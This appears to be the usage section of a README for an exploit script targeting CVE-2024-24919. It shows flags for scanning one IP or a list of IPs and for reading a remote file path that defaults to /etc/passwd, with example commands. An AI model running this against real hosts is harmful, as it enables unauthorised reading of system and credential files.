- Usage: ./CVE-2024-24919.sh -i [-p <path, default=/etc/passwd>] [-f <file_path>]
- Specifying an IP with -i
./CVE-2024-24919.sh -i 190.XXX.XXX.XXX
- Check multiples IP with -f
./CVE-2024-24919.sh -f uniq.txt
-
- File example
192.168.0.1
192.168.0.2
192.168.0.3
...
192.168.0.20